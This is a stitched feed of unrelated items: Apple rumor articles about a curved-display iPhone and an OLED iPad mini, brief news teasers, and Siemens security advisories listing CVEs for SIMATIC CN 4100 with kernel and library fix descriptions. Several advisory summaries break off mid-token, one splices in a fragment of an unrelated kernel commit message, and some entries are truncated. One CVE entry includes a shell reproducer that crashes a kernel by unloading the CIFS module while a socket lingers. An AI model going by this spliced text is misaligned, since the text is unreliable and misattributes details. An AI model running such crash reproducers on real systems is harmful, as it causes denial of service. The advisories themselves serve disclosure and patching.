Apple is already planning a second version of the "four-edge bending" display that is rumored to debut on next year's 20th-anniversary iPhone, claims a new report out of Korea. For the 20th-anniversary iPhone, Apple is said to be introducing a display that curves down around all four edges of the device for a borderless visual experience. It could be one of the biggest design shifts in the iPhone's history since the 10th anniversary iPhone X, which saw Apple drop the Home button, introduce a notched display, and adopt an intuitive swipe gesture-based navigation interface. Today, ETNews reports that Apple is planning a two-stage rollout for the new OLED display technology that the commemorative iPhone will use, with a more advanced version said to be coming a year later. For the 2027 variant, Apple will reportedly rely on OLED technology that uses a magnesium-silver (MgAg) alloy in the cathode layer. This implementation can cause image distortion and brightness loss in the curved areas, but Apple is apparently willing to live with the compromise for the 20th-anniversary iPhone while more advanced technology scales. Apple then plans to address the issue in 2028 by transitioning to next-generation transparent electrodes. Apple will reportedly switch to indium zinc oxide (IZO) cathode materials, and because IZO is more transparent, it should reduce distortion, uneven brightness, and heat issues around the curved edges while enabling even narrower bezels. ETNews reports that Samsung Display and LG Display have already been put on alert to prepare for the two-stage rollout. LG recently announced a ₩1.106 trillion investment (roughly $790 million) in OLED infrastructure, which industry observers believe is connected to development and mass production of the new technology. Meanwhile, Samsung is reportedly evaluating whether its existing OLED lines can accommodate the required hardware, but a dedicated production line is not out of the question, and may well be necessary. Bloomberg in May 2025 reported on Apple's plans to launch a "mostly glass, curved iPhone without any cutouts in the display" for its 20th-anniversary model. The Information last year also cited multiple sources claiming that at least one new iPhone model launching in 2027 will have a truly edge-to-edge display. Tags: 20th-Anniversary iPhone, ETNews. This article, "20th Anniversary iPhone's Curved Display to Improve a Year Later" first appeared on MacRumors.com.
I have been writing about the Cache Aware Scheduling work led by Intel engineers on the Linux kernel for more than a year. I've also tested out Cache Aware Scheduling on both Intel and AMD CPUs with the patched Linux kernel to great success. And thus I'm very happy to see the Cache Aware Scheduling patches inching closer to the mainline Linux kernel...
A beaver has attracted great attention out in the archipelago after several islanders caught sight of the animal. During a walk on Vrångö with her husband and dog, Pia Ternstrand spotted the unusual guest.
Initial access broker KongTuke has moved to Microsoft Teams for social engineering attacks, taking as little as five minutes to gain persistent access to corporate networks. [...]
Strengthening Indonesia’s digital ecosystem through AI, cloud computing, and next-gen connectivity
Salt Typhoon has hit an energy entity in Azerbaijan. Twill Typhoon has targeted Asian entities with an updated RAT. The post Chinese APTs Expand Targets, Update Backdoors in Recent Campaigns appeared first on SecurityWeek.
According to the latest rumors, Apple is close to launching its next-generation iPad mini. So what should we expect from the successor to the iPad mini 7 that Apple released over a year ago? Read on to find out.

Processor and Performance

Apple is working on a next-generation version of the iPad mini (codename J510/J511) that features the A19 Pro chip, according to information found in code that Apple mistakenly shared in August. Apple's A19 Pro chip has since debuted in the iPhone Air and iPhone 17 Pro models. The iPhone 17 Pro models include the higher-end version of Apple's A19 Pro chip with a 6-core CPU and a 6-core GPU, while the iPhone Air uses a mid-tier A19 Pro chip with one fewer GPU core than the A19 Pro chip used in the iPhone 17 Pro and Pro Max. If the code leak is accurate for the iPad mini 8, Apple is likely to use the mid-tier A19 Pro chip found in the iPhone Air. This is based on the fact that the A17 Pro chip used in the iPad mini 7 has a 6-core CPU with two high-performance cores and four efficiency cores, along with a 5-core GPU, compared to the 6-core GPU found on the A17 Pro used in the iPhone 15 Pro. Apple built the A19 Pro chip on an upgraded third-generation 3-nanometer N3P process for modest speed and efficiency improvements. The chip includes a 16-core Neural Engine, next-generation dynamic caching, and unified image compression. The GPU in the A19 Pro has an upgraded architecture with a larger cache, more memory, and Neural Accelerators that are built into each core. Apple says that this change provides 3× the peak GPU compute over the prior-generation chip. There's also an upgraded 16-core Neural Engine for AI tasks. There is an outside chance that Apple opts for the A20 Pro chip for the new iPad mini. The claim has been made by a MacRumors tipster who analyzed a macOS kernel debug kit containing internal Apple codenames. However, the iPad mini has not always received Apple's newest A-series chip at the time it was updated, so the A19 Pro cannot be ruled out at this time. iPhone 18 Pro models are also expected to use the A20 Pro chip, which will reportedly be fabricated with TSMC's advanced 2nm process.

Display

Apple's plan to transition the iPad mini from an LCD to an OLED display is widely rumored. According to Bloomberg's Mark Gurman, the small form-factor tablet is likely to be the next Apple device to adopt OLED. According to a Chinese leaker with sources in Apple's supply chain, Apple has evaluated a Samsung-made OLED display for its next iPad mini model. It remains unclear whether the iPad mini 8 will feature a higher refresh rate than the 60Hz LCD display used in the existing iPad mini 7, but since the new base iPhone 17 now uses a 120Hz ProMotion panel, it would be reasonable to expect the same on the first OLED iPad mini. A separate report has suggested the iPad mini 8's screen could increase in size from 8.3 inches to 8.7 inches with the adoption of OLED. OLED panels can individually control each pixel, resulting in more precise color reproduction and deeper blacks compared to other common display technologies. They also provide superior contrast, faster response times, better viewing angles, and greater design flexibility. All of Apple's flagship iPhones use OLED panels, and in May 2024 the company brought the display technology to the iPad Pro for the first time. Unlike Apple's iPad Pro models, which feature two-stack low-temperature polycrystalline oxide (LTPO) OLED panels, the iPad mini may have a single-stack low-temperature polycrystalline silicon (LTPS) panel, which would make it dimmer.

Chassis Design

Apple is reportedly working to give the iPad mini 8 a more water-resistant design, according to Bloomberg's Mark Gurman. The updated casing would bring protection levels closer to those of the iPhone, making the tablet safer for use in damp environments. To achieve this, Apple is said to have designed a new vibration-based speaker system that eliminates the need for traditional speaker holes. By using sound-emitting surfaces instead of open grilles, the company can reduce potential entry points for water and dust, resulting in a more sealed, durable enclosure. On the iPhone, Apple relies on adhesives and gaskets to shield speakers and other openings from moisture. The iPad mini's approach appears to go further, doing away with the holes altogether. Current iPad mini models lack any official IP rating, but the upcoming version could mark the first in the lineup to feature a certified level of water protection. Apple patents could offer further clues to the new design direction. For example, a 2014 patent outlines a "mechanically actuated panel acoustic system" that vibrates flat surfaces to generate sound, effectively turning parts of a device's chassis into a speaker diaphragm. This could potentially allow Apple to produce audio without visible speaker holes. The patent suggests Apple has been building towards a sealed, vibration-based acoustic system for several years.

Release Date

According to research firm Omdia, the iPad mini is expected to adopt an OLED display in 2027. However, Korea's ET News and ZDNET Korea have both suggested that the iPad mini will be updated with an OLED display in 2026. Bloomberg has also said the update could come as soon as this year. The most recent word on the subject comes from Weibo-based leaker Instant Digital, who claims the OLED iPad mini will be launched in the second half of 2026 at the earliest. In May 2024, it was reported that Samsung Display had started developing sample OLED panels for a future iPad mini, with plans to initiate mass production at its facility in Cheonan in the second half of 2025. The same report claimed that Apple will bring an OLED panel to the iPad Air alongside the iPad mini in 2026, though Apple only refreshed the iPad Air in March, and more recent reporting suggests an OLED iPad Air will arrive in early 2027. The latter outlook aligns with a December report by analyst firm Display Supply Chain Consultants (DSCC) that said an 8.5-inch OLED iPad mini is planned for a 2026 launch, while 11-inch and 13-inch OLED iPad Air models are expected to follow in 2027. Ultimately, there are no rumors suggesting exactly when the next iPad mini will be released, but a launch later in 2026 has a high probability.

Pricing

Apple's iPad mini with OLED display technology and improved water resistance is expected to be more expensive, and Apple could charge up to $100 more for the device, according to Bloomberg's Gurman. The iPad mini is currently priced starting at $499. Gurman has previously argued that Apple should consider a lower-end version of the mini, or at least a change to its current $499 starting price, given that it's up against rival products that cost a lot less. However, Apple users who are looking for a more affordable option should probably consider the 10th-generation iPad instead. Starting at $329, the iPad offers many iPad mini features, such as Touch ID and Center Stage, but at a lower price that balances functionality and affordability.

Tag: OLED. This article, "OLED iPad Mini: Release Date, Pricing, and What to Expect" first appeared on MacRumors.com.
The UK's Health Secretary Wes Streeting is leaving his post, he writes in an open letter in which he states that he has lost confidence in Prime Minister Keir Starmer. At the same time, Greater Manchester Mayor Andy Burnham is reported to want to return to Parliament.
Summary

ROS# contains a ROS service, file_server, that before version 2.2.2 contains a path traversal vulnerability which could allow an attacker to access, i.e. read and write, arbitrary files that are accessible with the user rights of the user that runs the service, on the system that hosts the service. Siemens has released a new version for ROS# and recommends updating to the latest version. The following versions of Siemens ROS# are affected: ROS# vers:intdot/
Summary

Siemens gPROMS Web Applications Publisher (gWAP) is affected by a remote code execution vulnerability introduced through a third-party component, namely the Axios HTTP client library. The vulnerability stems from a specific "Gadget" attack chain that allows prototype pollution in other third-party libraries, potentially allowing an attacker to execute arbitrary code. Siemens has released a new version for gWAP and recommends updating to the latest version. The following versions of Siemens gWAP are affected: gWAP vers:intdot/
Summary

SIMATIC CN 4100 contains multiple vulnerabilities which could potentially lead to a compromise in availability, integrity and confidentiality. Siemens has released a new version for SIMATIC CN 4100 and recommends updating to the latest version. The following versions of Siemens SIMATIC are affected: SIMATIC CN 4100 vers:intdot/hpo_dp_link_enc before using it

[WHAT & HOW] Functions dp_enable_link_phy and dp_disable_link_phy can pass link_res without initializing hpo_dp_link_enc and it is necessary to check for null before dereferencing. This fixes 2 FORWARD_NULL issues reported by Coverity.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-476 NULL Pointer Dereference
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2024-57924

In the Linux kernel, the following vulnerability has been resolved:

fs: relax assertions on failure to encode file handles

Encoding file handles is usually performed by a filesystem ->encode_fh() method that may fail for various reasons. The legacy users of exportfs_encode_fh(), namely, nfsd and name_to_handle_at(2) syscall are ready to cope with the possibility of failure to encode a file handle. There are a few other users of exportfs_encode_{fh,fid}() that currently have a WARN_ON() assertion when ->encode_fh() fails. Relax those assertions because they are wrong. The second linked bug report states commit 16aac5ad1fa9 ("ovl: support encoding non-decodable file handles") in v6.6 as the regressing commit, but this is not accurate. The aforementioned commit only increases the chances of the assertion and allows triggering the assertion with the reproducer using overlayfs, inotify and drop_caches.
Triggering this assertion was always possible with other filesystems and other reasons of ->encode_fh() failures and more particularly, it was also possible with the exact same reproducer using overlayfs that is mounted with options index=on,nfs_export=on also on kernels < v6.6. Therefore, I am not listing the aforementioned commit as a Fixes commit. Backport hint: this patch will have a trivial conflict applying to v6.6.y, and other trivial conflicts applying to stable kernels < v6.6.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-617 Reachable Assertion
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2024-58240

In the Linux kernel, the following vulnerability has been resolved:

tls: separate no-async decryption request handling from async

If we're not doing async, the handling is much simpler. There's no reference counting, we just need to wait for the completion to wake us up and return its result. We should preferably also use a separate crypto_wait. I'm not seeing a UAF as I did in the past, I think aec7961916f3 ("tls: fix race between async notify and socket close") took care of it. This will make the next fix easier.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-416 Use After Free
Metrics: CVSS Version 3.1; Base Score 7.3; Base Severity HIGH; Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE-2025-6021

A flaw was found in libxml2's xmlBuildQName function, where integer overflows in buffer size calculations can lead to a stack-based buffer overflow.
This issue can result in memory corruption or a denial of service when processing crafted input.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS Version 3.1; Base Score 7.5; Base Severity HIGH; Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2025-6052

A flaw was found in how GLib’s GString manages memory when adding data to strings. If a string is already very large, combining it with more input can cause a hidden overflow in the size calculation. This makes the system think it has enough memory when it doesn’t. As a result, data may be written past the end of the allocated memory, leading to crashes or memory corruption.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-190 Integer Overflow or Wraparound
Metrics: CVSS Version 3.1; Base Score 3.7; Base Severity LOW; Vector String CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2025-7425

A flaw was found in libxslt where the attribute type, atype, flags are modified in a way that corrupts internal memory management. When XSLT functions, such as the key() process, result in tree fragments, this corruption prevents the proper cleanup of ID attributes. As a result, the system may access freed memory, causing crashes or enabling attackers to trigger heap corruption.
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-416 Use After Free
Metrics: CVSS Version 3.1; Base Score 7.8; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H

CVE-2025-8916

Allocation of Resources Without Limits or Throttling vulnerability in Legion of the Bouncy Castle Inc. BC Java bcpkix on All (API modules), Legion of the Bouncy Castle Inc. BC Java bcprov on All (API modules), Legion of the Bouncy Castle Inc. BCPKIX FIPS bcpkix-fips on All (API modules) allows Excessive Allocation. This vulnerability is associated with program files https://github.Com/bcgit/bc-java/blob/main/pkix/src/main/java/org/bouncycastle/pkix/jcajce/PKIXCertPathReviewer.Java, https://github.Com/bcgit/bc-java/blob/main/prov/src/main/java/org/bouncycastle/x509/PKIXCertPathReviewer.Java. This issue affects BC Java: from 1.44 through 1.78; BC Java: from 1.44 through 1.78; BCPKIX FIPS: from 1.0.0 through 1.0.7, from 2.0.0 through 2.0.7.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-770 Allocation of Resources Without Limits or Throttling
Metrics: CVSS Version 3.1; Base Score 5.3; Base Severity MEDIUM; Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2025-9230

Issue summary: An application trying to decrypt CMS messages encrypted using password based encryption can trigger an out-of-bounds read and write.

Impact summary: This out-of-bounds read may trigger a crash which leads to Denial of Service for an application.
The out-of-bounds write can cause a memory corruption which can have various consequences including a Denial of Service or Execution of attacker-supplied code. Although the consequences of a successful exploit of this vulnerability could be severe, the probability that the attacker would be able to perform it is low. Besides, password based (PWRI) encryption support in CMS messages is very rarely used. For that reason the issue was assessed as Moderate severity according to our Security Policy. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as the CMS implementation is outside the OpenSSL FIPS module boundary.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-125 Out-of-bounds Read
Metrics: CVSS Version 3.1; Base Score 7.5; Base Severity HIGH; Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2025-9231

Issue summary: A timing side-channel which could potentially allow remote recovery of the private key exists in the SM2 algorithm implementation on 64 bit ARM platforms.

Impact summary: A timing side-channel in SM2 signature computations on 64 bit ARM platforms could allow recovering the private key by an attacker. While remote key recovery over a network was not attempted by the reporter, timing measurements revealed a timing signal which may allow such an attack. OpenSSL does not directly support certificates with SM2 keys in TLS, and so this CVE is not relevant in most TLS contexts. However, given that it is possible to add support for such certificates via a custom provider, coupled with the fact that in such a custom provider context the private key may be recoverable via remote timing measurements, we consider this to be a Moderate severity issue.
The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as SM2 is not an approved algorithm.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-385 Covert Timing Channel
Metrics: CVSS Version 3.1; Base Score 6.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

CVE-2025-9232

Issue summary: An application using the OpenSSL HTTP client API functions may trigger an out-of-bounds read if the 'no_proxy' environment variable is set and the host portion of the authority component of the HTTP URL is an IPv6 address.

Impact summary: An out-of-bounds read can trigger a crash which leads to Denial of Service for an application. The OpenSSL HTTP client API functions can be used directly by applications but they are also used by the OCSP client functions and CMP (Certificate Management Protocol) client implementation in OpenSSL. However the URLs used by these implementations are unlikely to be controlled by an attacker. In this vulnerable code the out of bounds read can only trigger a crash. Furthermore the vulnerability requires an attacker-controlled URL to be passed from an application to the OpenSSL function and the user has to have a 'no_proxy' environment variable set. For the aforementioned reasons the issue was assessed as Low severity. The vulnerable code was introduced in the following patch releases: 3.0.16, 3.1.8, 3.2.4, 3.3.3, 3.4.0 and 3.5.0. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as the HTTP client implementation is outside the OpenSSL FIPS module boundary.
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-125 Out-of-bounds Read
Metrics: CVSS Version 3.1; Base Score 5.9; Base Severity MEDIUM; Vector String CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2025-9820

A flaw was found in the GnuTLS library, specifically in the gnutls_pkcs11_token_init() function that handles PKCS#11 token initialization. When a token label longer than expected is processed, the function writes past the end of a fixed-size stack buffer. This programming error can cause the application using GnuTLS to crash or, in certain conditions, be exploited for code execution. As a result, systems or applications relying on GnuTLS may be vulnerable to a denial of service or local privilege escalation attacks.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-121 Stack-based Buffer Overflow
Metrics: CVSS Version 3.1; Base Score 4; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2025-14831

A flaw was found in GnuTLS. This vulnerability allows a denial of service (DoS) by excessive CPU (Central Processing Unit) and memory consumption via specially crafted malicious certificates containing a large number of name constraints and subject alternative names (SANs).
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-407 Inefficient Algorithmic Complexity
Metrics: CVSS Version 3.1; Base Score 5.3; Base Severity MEDIUM; Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2025-23143

In the Linux kernel, the following vulnerability has been resolved:

net: Fix null-ptr-deref by sock_lock_init_class_and_name() and rmmod.

When I ran the repro [0] and waited a few seconds, I observed two LOCKDEP splats: a warning immediately followed by a null-ptr-deref. [1]

Reproduction Steps:

1) Mount CIFS
2) Add an iptables rule to drop incoming FIN packets for CIFS
3) Unmount CIFS
4) Unload the CIFS module
5) Remove the iptables rule

At step 3), the CIFS module calls sock_release() for the underlying TCP socket, and it returns quickly. However, the socket remains in FIN_WAIT_1 because incoming FIN packets are dropped. At this point, the module's refcnt is 0 while the socket is still alive, so the following rmmod command succeeds.

  # ss -tan
  State      Recv-Q Send-Q Local Address:Port  Peer Address:Port
  FIN-WAIT-1 0      477    10.0.2.15:51062     10.0.0.137:445

  # lsmod | grep cifs
  cifs 1159168 0

This highlights a discrepancy between the lifetime of the CIFS module and the underlying TCP socket. Even after CIFS calls sock_release() and it returns, the TCP socket does not die immediately in order to close the connection gracefully. While this is generally fine, it causes an issue with LOCKDEP because CIFS assigns a different lock class to the TCP socket's sk->sk_lock using sock_lock_init_class_and_name(). Once an incoming packet is processed for the socket or a timer fires, sk->sk_lock is acquired. Then, LOCKDEP checks the lock context in check_wait_context(), where hlock_class() is called to retrieve the lock class.
However, since the module has already been unloaded, hlock_class() logs a warning and returns NULL, triggering the null-ptr-deref. If LOCKDEP is enabled, we must ensure that a module calling sock_lock_init_class_and_name() (CIFS, NFS, etc) cannot be unloaded while such a socket is still alive to prevent this issue. Let's hold the module reference in sock_lock_init_class_and_name() and release it when the socket is freed in sk_prot_free(). Note that sock_lock_init() clears sk->sk_owner for svc_create_socket() that calls sock_lock_init_class_and_name() for a listening socket, which clones a socket by sk_clone_lock() without GFP_ZERO.

[0]:

  CIFS_SERVER="10.0.0.137"
  CIFS_PATH="//${CIFS_SERVER}/Users/Administrator/Desktop/CIFS_TEST"
  DEV="enp0s3"
  CRED="/root/WindowsCredential.txt"

  MNT=$(mktemp -d /tmp/XXXXXX)
  mount -t cifs ${CIFS_PATH} ${MNT} -o vers=3.0,credentials=${CRED},cache=none,echo_interval=1

  iptables -A INPUT -s ${CIFS_SERVER} -j DROP

  for i in $(seq 10);
  do
      umount ${MNT}
      rmmod cifs
      sleep 1
  done

  rm -r ${MNT}

  iptables -D INPUT -s ${CIFS_SERVER} -j DROP

[1]:

  DEBUG_LOCKS_WARN_ON(1)
  WARNING: CPU: 10 PID: 0 at kernel/locking/lockdep.c:234 hlock_class (kernel/locking/lockdep.c:234 kernel/locking/lockdep.c:223)
  Modules linked in: cifs_arc4 nls_ucs2_utils cifs_md4 [last unloaded: cifs]
  CPU: 10 UID: 0 PID: 0 Comm: swapper/10 Not tainted 6.14.0 #36
  Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014
  RIP: 0010:hlock_class (kernel/locking/lockdep.c:234 kernel/locking/lockdep.c:223)
  ...
  Call Trace:
   __lock_acquire (kernel/locking/lockdep.c:4853 kernel/locking/lockdep.c:5178)
   lock_acquire (kernel/locking/lockdep.c:469 kernel/locking/lockdep.c:5853 kernel/locking/lockdep.c:5816)
   _raw_spin_lock_nested (kernel/locking/spinlock.c:379)
   tcp_v4_rcv (./include/linux/skbuff.h:1678 ./include/net/tcp.h:2547 net/ipv4/tcp_ipv4.c:2350)
  ...
  BUG: kernel NULL pointer dereference, address: 00000000000000c4
  PF: supervisor read access in kernel mode
  PF: error_code(0x0000) - not-present page
  PGD 0
  Oops: Oops: 0000 [#1] PREEMPT SMP NOPTI
  CPU: 10 UID: 0 PID: 0 Comm: swapper/10 Tainted: G W 6.14.0 #36
  Tainted: [W]=WARN
  Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014
  RIP: 0010:__lock_acquire (kernel/
  ---truncated---

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-476 NULL Pointer Dereference
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-23160

In the Linux kernel, the following vulnerability has been resolved:

media: mediatek: vcodec: Fix a resource leak related to the scp device in FW initialization

On Mediatek devices with a system companion processor (SCP) the mtk_scp structure has to be removed explicitly to avoid a resource leak. Free the structure in case the allocation of the firmware structure fails during the firmware initialization.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-401 Missing Release of Memory after Effective Lifetime
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-31257

This issue was addressed with improved memory handling. This issue is fixed in Safari 18.5, iOS 18.5 and iPadOS 18.5, macOS Sequoia 15.5, tvOS 18.5, visionOS 2.5, watchOS 11.5. Processing maliciously crafted web content may lead to an unexpected Safari crash.
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
Metrics: CVSS Version 3.1; Base Score 4.7; Base Severity MEDIUM; Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:L

CVE-2025-37931

In the Linux kernel, the following vulnerability has been resolved:

btrfs: adjust subpage bit start based on sectorsize

When running machines with 64k page size and a 16k nodesize we started seeing tree log corruption in production. This turned out to be because we were not writing out dirty blocks sometimes, so this in fact affects all metadata writes.

When writing out a subpage EB we scan the subpage bitmap for a dirty range. If the range isn't dirty we do

  bit_start++;

to move onto the next bit. The problem is the bitmap is based on the number of sectors that an EB has. So in this case, we have a 64k pagesize, 16k nodesize, but a 4k sectorsize. This means our bitmap is 4 bits for every node. With a 64k page size we end up with 4 nodes per page.

To make this easier this is how everything looks

  [0        16k       32k       48k     ] logical address
  [0        4         8         12      ] radix tree offset
  [               64k page              ] folio
  [ 16k eb ][ 16k eb ][ 16k eb ][ 16k eb ] extent buffers
  [ | | | | | | | | | | | | | | | | ] bitmap

Now we use all of our addressing based on fs_info->sectorsize_bits, so as you can see the above our 16k eb->start turns into radix entry 4.

When we find a dirty range for our eb, we correctly do bit_start += sectors_per_node, because if we start at bit 0, the next bit for the next eb is 4, to correspond to eb->start 16k.

However if our range is clean, we will do bit_start++, which will now put us offset from our radix tree entries.
In our case, assume that the first time we check the bitmap the block is not dirty, we increment bit_start so now it == 1, and then we loop around and check again. This time it is dirty, and we go to find that start using the following equation

  start = folio_start + bit_start * fs_info->sectorsize;

so in the case above, eb->start 0 is now dirty, and we calculate start as

  0 + 1 * fs_info->sectorsize = 4096
  4096 >> 12 = 1

Now we're looking up the radix tree for 1, and we won't find an eb. What's worse is now we're using bit_start == 1, so we do bit_start += sectors_per_node, which is now 5. If that eb is dirty we will run into the same thing, we will look at an offset that is not populated in the radix tree, and now we're skipping the writeout of dirty extent buffers.

The best fix for this is to not use sectorsize_bits to address nodes, but that's a larger change. Since this is a fs corruption problem fix it simply by always using sectors_per_node to increment the start bit.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-37968

In the Linux kernel, the following vulnerability has been resolved:

iio: light: opt3001: fix deadlock due to concurrent flag access

The threaded IRQ function in this driver is reading the flag twice: once to lock a mutex and once to unlock it. Even though the code setting the flag is designed to prevent it, there are subtle cases where the flag could be true at the mutex_lock stage and false at the mutex_unlock stage. This results in the mutex not being unlocked, resulting in a deadlock.
Fix it by making the opt3001_irq() code generally more robust, reading the flag into a variable and using the variable value at both stages.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-667 Improper Locking
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38322

In the Linux kernel, the following vulnerability has been resolved:

perf/x86/intel: Fix crash in icl_update_topdown_event()

The perf_fuzzer found a hard-lockup crash on a RaptorLake machine:

  Oops: general protection fault, maybe for address 0xffff89aeceab400: 0000
  CPU: 23 UID: 0 PID: 0 Comm: swapper/23
  Tainted: [W]=WARN
  Hardware name: Dell Inc. Precision 9660/0VJ762
  RIP: 0010:native_read_pmc+0x7/0x40
  Code: cc e8 8d a9 01 00 48 89 03 5b cd cc cc cc cc 0f 1f ...
  RSP: 000:fffb03100273de8 EFLAGS: 00010046
  ....
  Call Trace:
    icl_update_topdown_event+0x165/0x190
    ? ktime_get+0x38/0xd0
    intel_pmu_read_event+0xf9/0x210
    __perf_event_read+0xf9/0x210

CPUs 16-23 are E-core CPUs that don't support the perf metrics feature. The icl_update_topdown_event() should not be invoked on these CPUs.

It's a regression of commit: f9bdf1f95339 ("perf/x86/intel: Avoid disable PMU if !cpuc->enabled in sample read")

The bug introduced by that commit is that the is_topdown_event() function is mistakenly used to replace the is_topdown_count() call to check if the topdown functions for the perf metrics feature should be invoked.

Fix it.
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
